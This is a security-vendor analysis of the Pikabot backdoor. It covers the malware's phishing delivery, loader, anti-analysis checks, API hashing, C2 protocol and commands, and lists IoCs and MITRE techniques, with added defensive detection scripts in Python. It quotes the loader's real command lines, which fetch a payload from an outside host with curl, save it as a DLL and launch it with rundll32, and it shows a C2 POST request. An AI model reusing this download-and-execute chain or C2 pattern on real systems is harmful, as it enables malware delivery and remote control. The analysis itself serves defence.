
Pikabot Malware Analysis | 2024

Pikabot is a backdoor malware, used as the initial access point in high-profile cyberattacks. It is generally used to deliver other malware.


Pikabot Backdoor Analysis by Gridinsoft

Pikabot Backdoor

March 08, 2024

Backdoors are power brokers of the malware world. Stealthy and evasive, they provide initial access and remote control over malware deployment. This one is stealthy enough to shock you. Meet Pikabot – a rising star of backdoors.

Pikabot is a modular backdoor malware, first detected in early 2023. Despite being a newcomer to the threat landscape, it quickly gained popularity over its peers and became particularly known as a substitute for the infamous QakBot. The flexibility of the final payload, the selection of auxiliary software, continuous development and tricky delivery methods make it a serious contender and a major security threat.

The main use of Pikabot is providing initial access in high-end cyberattacks. The backdoor is used to deploy toolkits like Cobalt Strike, ransomware or other malware tools that may be used in the attack. Such sophisticated payloads go a long way to explain the spreading methods and the scale of the malware's activity.

Let’s dive into how Pikabot works, starting with the way it infiltrates the system and moving on to the key action – remote access and payload deployment.

Pikabot Spreading Ways

The main tactic Pikabot uses to gain initial access is spear phishing. As mentioned above, this malware is mainly used in targeted attacks on companies, so opting for the most effective and convincing method is a must. Mass distribution is not the main approach here, although it may be used in later attacks.

Figure: Typical example of a message that spreads Pikabot. Source: ANY.RUN

The spam emails most commonly use routine workplace topics – documents, paperwork, reports and so forth. At some point, threat actors started using a technique called thread hijacking, which tricks people into thinking the attacker's email is a genuine part of an existing conversation. Such email messages contain an attached MS Office document, a PDF file or an archive. By launching the attachment, an unsuspecting victim initiates the attack chain.

Analysis uncovers several approaches to deploying the actual payload, depending on the format of the attached file. When it is an archive, the malware is often already inside, and the unsuspecting victim is lured into running a script that launches it. The script is disguised as a document, but the file in fact has a double extension – docx.lnk, for example. It is made to run a DLL file stored in the same archive.
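A mail-gateway style check for the archive lure just described, added here as an example and not code from the article or from Gridinsoft: it lists the members of a ZIP attachment without extracting anything and flags members that are executable by extension or that carry a document.executable double extension such as docx.lnk. The archive contents are constructed in memory for the demo; the member names (including the DLL name taken from the article's loader command) are placeholders, not real files.

```python
"""Archive-attachment triage for the docx.lnk lure: flag executable members and
document.executable double extensions. Added example; the archive is constructed."""
import io
import zipfile
from pathlib import PurePosixPath

# Extensions that Windows executes on double-click (subset chosen for this example)
EXECUTABLE_EXTS = {".lnk", ".exe", ".dll", ".js", ".vbs", ".cmd", ".bat", ".hta", ".scr"}
# Extensions a lure uses to make the member look like an ordinary document
DOCUMENT_EXTS = {".docx", ".doc", ".pdf", ".xlsx", ".xls", ".txt"}


def suspicious_members(names: list) -> dict:
    """Return {member_name: [reasons]} for every archive member worth blocking or sandboxing."""
    findings = {}
    for name in names:
        suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
        reasons = []
        if suffixes and suffixes[-1] in EXECUTABLE_EXTS:
            reasons.append(f"executable member ({suffixes[-1]})")
        # "Invoice.docx.lnk": the real type is the last suffix, the document suffix is bait
        if len(suffixes) >= 2 and suffixes[-2] in DOCUMENT_EXTS and suffixes[-1] in EXECUTABLE_EXTS:
            reasons.append("double extension disguised as a document")
        if reasons:
            findings[name] = reasons
    return findings


def scan_zip(data: bytes) -> dict:
    """Inspect a ZIP attachment by its central directory only; no member is extracted."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return suspicious_members(archive.namelist())


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the lure: a .docx.lnk shortcut beside a DLL and a benign text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Invoice_2024.docx.lnk", b"placeholder, not a real shortcut")
        archive.writestr("Ikfigkvosjr.dll", b"placeholder, not a real DLL")
        archive.writestr("readme.txt", b"benign text")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(reasons))
```

The check deliberately works on names only, so it can run at the gateway before any member is unpacked; a .lnk inside an archive attachment has no legitimate business use and is a safe block on its own.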

When a PDF file is attached to the email, its content usually mimics an error message that asks the user to download the original document from a link. One particular case used a OneDrive error message and asked to get the file “from the cloud storage”. Following the instruction starts the download of a script that connects to the remote server, then downloads and runs the payload.

Figure: Contents of a fake PDF file that Pikabot uses to trick users into downloading malware

Malvertising is the alternative approach, used much less often than email spam, probably because it lacks targeting precision. This method relies on the faulty filtering of advertisements by major ad providers, like Google or Meta. By parasitizing on the names of free software, drivers and some specific tools, hackers lure the user into downloading and installing the malware themselves.

Pikabot Technical Analysis

As mentioned in previous paragraphs, Pikabot is typically delivered by a loader script. The latter employs a rather tricky approach to deliver the malware’s DLL and execute it. The script creates a folder on the system drive and downloads a DAT file using a curl command. The downloaded file is then saved as a library – this is, exactly, Pikabot.

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

The script likely carries a selection of backup payload sources, which it will try in turn until the malware is successfully downloaded. After that, the script calls the rundll32.exe process to launch the downloaded DLL.

"C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
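Detection logic for the two-stage loader chain shown above, added here as an example (not the article's or Gridinsoft's code). It runs over constructed process-creation events whose field names follow Sysmon Event ID 1; the two malicious command lines are the ones quoted in the article, the benign ones are made up, and the ParentImage values are an assumption, since the article only says the stages come from a loader script.

```python
"""Flag process-creation events matching the curl-to-DLL / rundll32 loader chain.
Added example; events are constructed, ParentImage values are assumed."""
import re

SAMPLE_EVENTS = [
    {  # download stage quoted in the article
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll',
    },
    {  # execution stage quoted in the article
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter',
    },
    {  # benign (constructed): curl fetching an archive into a user profile
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /c curl https://example.com/tool.zip --output C:\Users\bob\Downloads\tool.zip',
    },
    {  # benign (constructed): Windows itself using rundll32 on a system DLL
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    },
]

# curl ... --output <something>.dll : a downloader writing a library to disk
CURL_TO_DLL = re.compile(r'\bcurl\b.*?--output\s+"?([^\s"]+\.dll)\b', re.IGNORECASE)
# rundll32 <path>.dll,<export> : capture the DLL path and the export name
RUNDLL_EXPORT = re.compile(r'\brundll32(?:\.exe)?\s+"?([^\s",]+\.dll)"?\s*,\s*(\w+)', re.IGNORECASE)
# Directories where rundll32 loading a DLL is expected; anything else is worth a look
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def in_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_PREFIXES)


def check_event(event: dict) -> list:
    """Return the reasons an event looks like the Pikabot loader, or [] if it does not."""
    cmd = event["CommandLine"]
    reasons = []
    match = CURL_TO_DLL.search(cmd)
    if match:
        reasons.append(f"curl writes a DLL to {match.group(1)}")
        if re.search(r"\bmkdir\b", cmd, re.IGNORECASE):
            reasons.append("same command line creates the drop directory (mkdir)")
    match = RUNDLL_EXPORT.search(cmd)
    if match and not in_trusted_dir(match.group(1)):
        reasons.append(f"rundll32 loads {match.group(1)} (export {match.group(2)}) from an untrusted directory")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if reasons and parent in SCRIPT_HOSTS:
        reasons.append("parent is a script interpreter, consistent with a loader script")
    return reasons


def scan(events: list) -> list:
    """(index, reasons) for every event that produced at least one finding."""
    hits = []
    for index, event in enumerate(events):
        reasons = check_event(event)
        if reasons:
            hits.append((index, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

Each finding alone is weak (admins do use curl, and rundll32 is everywhere), so the value is in the combination: a DLL written by curl into a freshly created directory under the drive root, then loaded by rundll32 with a named export, both spawned from a script host.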

Launch, Detection and Analysis Evasion

Pikabot's activity begins with a basic set of checks performed right after execution. First, the malware ensures that it is not running in a debug environment using the WinAPI call NtQueryInformationProcess. If this check reports no debugger, the malware continues execution by decrypting and running the rest of its DLL file. Then another round of anti-analysis checks takes place, primarily aimed at evading virtual machines and sandboxes.

Figure: Supposed code array used by Pikabot

List of DLLs Pikabot searches for during anti-analysis:

  • Cmdvrt.32.dll
  • cmdvrt.64.dll
  • Cuckoomon.dll
  • Pstorec.dll
  • avghookx.dll
  • Avghooka.dll
  • Snxhk.dll
  • api_log.dll
  • Dir_watch.dll
  • Wpespy.dll

Upon finishing this check, the malware proceeds by assembling its core from several pieces scattered in encrypted form across the .data section of the DLL. After decrypting these pieces using unique hardcoded RC4 keys, the malware performs process hollowing against the ctfmon.exe process, although a different process may be used for this purpose.

It is worth noting that the detection evasion tricks do not stop here. Pikabot keeps checking for signs of a debugger or sandbox after almost every networking operation, as well as after some local activities.

Execution and Fingerprinting

Once the malware core is loaded, Pikabot starts by resolving APIs, but not in the usual manner. To avoid detection, it looks up the needed API directly by its hash instead of using conventional resolution methods. This trick is used only for the first three functions the malware needs – GetProcAddress, HeapFree and LoadLibraryA. After this step, Pikabot switches to dynamic API resolution – a rather common practice among malware that tries to avoid EDR/XDR detection.
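The analyst-side counterpart of hash-based API resolution, added as an example (not the article's code): precompute the hash of every candidate export name and map the hash constants read out of a sample back to readable names. The ROR-13 routine is an assumption used for illustration only; the article does not say which hash function Pikabot uses, so in practice it is replaced by the routine recovered from the sample's resolver, and the export list is dumped from the real DLLs rather than the constructed subset below.

```python
"""Map API-name hashes back to export names. Added example; the hash routine
and the export list are assumptions standing in for sample-specific values."""
from __future__ import annotations


def ror13_hash(name: str) -> int:
    """Classic 32-bit rotate-right-13 accumulator over the ASCII export name (assumed algorithm)."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # rotate right by 13 within 32 bits
        h = (h + byte) & 0xFFFFFFFF
    return h


# Constructed subset of kernel32/ntdll exports; in practice dump the full export
# table (e.g. with pefile) of every DLL the sample might resolve from.
COMMON_EXPORTS = [
    "GetProcAddress", "HeapFree", "LoadLibraryA", "LoadLibraryW", "HeapAlloc",
    "VirtualAlloc", "VirtualProtect", "CreateProcessA", "WriteProcessMemory",
    "NtQueryInformationProcess",
]


def build_table(names, hasher=ror13_hash) -> dict[int, str]:
    """Precompute hash -> name for every candidate export; collisions are reported, not hidden."""
    table: dict[int, str] = {}
    for name in names:
        h = hasher(name)
        if h in table and table[h] != name:
            raise ValueError(f"hash collision: {table[h]} / {name}")
        table[h] = name
    return table


def resolve(hashes, table) -> dict[int, str | None]:
    """Look up each observed hash; None marks a value not in the table (extend the export list)."""
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    table = build_table(COMMON_EXPORTS)
    # Constants an analyst would read out of the sample's resolver calls (computed here for the demo)
    observed = [ror13_hash(n) for n in ("GetProcAddress", "HeapFree", "LoadLibraryA")] + [0xDEADBEEF]
    for h, name in resolve(observed, table).items():
        print(f"{h:#010x} -> {name or '<unresolved>'}")
```

Unresolved values are the useful signal: a hash that matches nothing in the table either means the export list is incomplete or that the hash routine was not recovered correctly, and both are worth going back to the disassembly for.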

At this point, the malware switches to gathering system information. The procedure goes through another check: if the malware detects that the system language is set to one from its banlist, it ceases further execution. Most samples have this list filled with languages of ex-USSR countries, which hints at the malware's country of origin. After passing this check, Pikabot gathers a selection of system properties – most likely in order to fingerprint the system. Below is the list of data it grabs before the initial C2 connection – a rather typical set for a backdoor malware.

  • Username
  • Computer name
  • Display info
  • Window Dimensions
  • CPU info
  • Physical/Virtual memory
  • Domain controller name
  • OS version
  • Snapshot of its own process

C2 Communication & Malware Delivery

The data collected in the previous step is sent to the command server in an HTTP POST request over HTTPS. The malware tries to evade detection by communicating over unusual ports that NDR solutions typically do not monitor. The full request looks like this:

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2
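A triage routine for the request above, added here as an example and not code from the article: it parses a captured (possibly defanged) HTTP request and scores the C2 traits visible in it, namely a raw-IP destination, an uncommon port, an Office User-Agent posting to an API-style path, a Host header that disagrees with the request target, a hex-blob body, and a match against a subset of the IP:port pairs from the article's IoC section. The Pikabot request is the one quoted above with the body truncated; the benign Exchange request is constructed for contrast.

```python
"""Score a captured HTTP request for Pikabot-like C2 traits. Added example;
KNOWN_C2 is a subset of the article's IoC list, the benign request is constructed."""
import ipaddress
from urllib.parse import urlsplit

KNOWN_C2 = {("15.235.47.80", 23399), ("139.180.216.25", 2967), ("210.243.8.247", 23399)}
COMMON_WEB_PORTS = {80, 443, 8080, 8443}

PIKABOT_REQUEST = """POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a4"""

BENIGN_REQUEST = """POST https://outlook.office365.com/EWS/Exchange.asmx HTTP/1.1
Host: outlook.office365.com
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Type: text/xml

<soap:Envelope/>"""


def parse_request(raw: str) -> dict:
    """Split request line, headers and body; accepts defanged hxxp(s) URLs and origin-form targets."""
    head, _, body = raw.replace("\r\n", "\n").strip().partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    url = urlsplit(target.replace("hxxp", "http", 1))
    host, port = url.hostname, url.port
    if host is None:  # origin-form target: fall back to the Host header
        host, _, raw_port = headers.get("host", "").partition(":")
        port = int(raw_port) if raw_port else None
    if port is None:
        port = 443 if url.scheme == "https" else 80
    return {"method": method, "host": host, "port": port, "path": url.path,
            "headers": headers, "body": body.strip()}


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess(req: dict) -> list:
    """Return the list of C2 traits present; an empty list means nothing stood out."""
    host, port = req["host"], req["port"]
    traits = []
    if is_ip_literal(host):
        traits.append("destination is a raw IP literal, not a hostname")
    if port not in COMMON_WEB_PORTS:
        traits.append(f"uncommon destination port {port}")
    user_agent = req["headers"].get("user-agent", "")
    if user_agent.startswith("Microsoft Office") and req["path"].startswith("/api/"):
        traits.append("Office User-Agent posting to an /api/ endpoint")
    host_header = req["headers"].get("host")
    if host_header and host_header not in (host, f"{host}:{port}"):
        traits.append(f"Host header {host_header} disagrees with request target {host}:{port}")
    body = req["body"]
    if len(body) >= 64 and set(body.lower()) <= set("0123456789abcdef"):
        traits.append("body is a long hex blob")
    if (host, port) in KNOWN_C2:
        traits.append("destination matches a published Pikabot C2")
    return traits


if __name__ == "__main__":
    for label, raw in (("pikabot", PIKABOT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, "->", assess(parse_request(raw)) or "no findings")
```

The IoC match is the only trait that is a hard hit; the others are the durable part, because the C2 addresses rotate while the shape of the traffic (raw IP, odd port, mismatched Host header, mismatched User-Agent) does not.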

In return, Pikabot receives a command that consists of an ID and supplementary data. Some of the functions duplicate each other, and some are not even functional, which suggests that this part of the malware is still under development.

Function code          Description
0x1A5A                 Stop Pikabot execution
0x246F                 Spawns its copy and changes the registry to correspond to this new file*
0xACB                  Execute a command* **
0x240, 0x359, 0x3A6    Duplicate the previous one (0xACB)
0x792                  Inject a shellcode into a process*
0x36C                  Inject a PE into a process*
0x985                  List the processes in the system**
0x2672, 0x982          Empty functions

* – command comes with supplementary data

** – the result is sent back to the C2

Cyberattacks With The Use of Pikabot

Being a particularly young malware, Pikabot cannot boast a large track record. To make matters worse, it remained in the shadow of Qbot until August 2023. Only after the takedown of what was once the biggest botnet did attackers turn their attention to Pikabot – and it has already managed to make a name for itself.

One particular malware campaign features Black Basta ransomware deployment. Sure enough, it was not a direct action: the research uncovered the deployment of a Cobalt Strike beacon by a Pikabot botnet, led by the Water Curupira threat actor. The said beacon was under the control of a ransomware gang. It is worth noting that Curupira was earlier noticed spreading the IcedID banker and the DarkGate loader, i.e. it definitely has enough connections in the cybercrime world to make use of every single merit of Pikabot.

Pikabot Indicators of Compromise

IP Addresses

15.235.202.109:2226
15.235.44.231:5938
15.235.45.155:2221
15.235.47.206:13783
15.235.47.80:23399
154.221.30.136:13724
154.61.75.156:2078
210.243.8.247:23399
65.20.78.68:13721
139.180.216.25:2967
51.195.232.97:13782
51.68.147.114:2083
51.79.143.215:13783
64.176.5.228:13783
64.176.67.194:2967
158.247.253.155:2225
70.34.209.101:13720
172.233.156.100:13721
154.92.19.139:2222
137.220.55.190:2223
188.26.127.4:13785
192.121.17.70:80
198.254.200.65:80

Hashes

MD5: 70e21c85d241bc5c7e1e41b6bb709ce0
MD5: fb2729cb59a5bc0420425ea693d26190
MD5: 527774acc9e68d3274e0806873b5c88d
MD5: 9a5a5b5f803d25de3e691e7dc53bb1c2
MD5: cafe2d4bd0ed1a67d84f33aca3cf4d1f
MD5: bcc53210e13294cbd6a8172558d99295
MD5: 4b1518535af6344af39bd90aa02a6c0d
MD5: 4c94707bdcf5c18307c69c9c6fe7a536

SHA256: eead7f5b6f1282ad988238cc8c39292fa99ea416f7793038a20e5caabe93112a
SHA256: 7e85b9d1d09301d8b3f48df44159347d89cb3c798d0436b5e9b060df4072b8c7
SHA256: 46e0fe3a942bb1f9aa9cd1b460ca7efa9acddb3c5b2d2bc3b42a87d8463f1c66
SHA256: 2bd1ee56ffd2bbeb6f4dd80783aa476d98faa946c4284b661e5c79f25c62ef79
SHA256: e2773b171d3bd55901647d406fc3de00c7a51bfe2f250667868948fe40fadc47
SHA256: dd2b6e3aa75de8460730862f2dc739537734a7dfc9e673b6a23ee58430348ddf
SHA256: 238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646
SHA256: a519b9d032a342985bfe1fa3f1244f1db6699805d7883139a8245eba1c2e5dab

MITRE ATT&CK

Technique     Description
T1566         Phishing
T1204.001     User Execution: Malicious Link
T1620         Reflective Code Loading
T1082         System Information Discovery
T1055         Process Injection
T1573         Encrypted Channel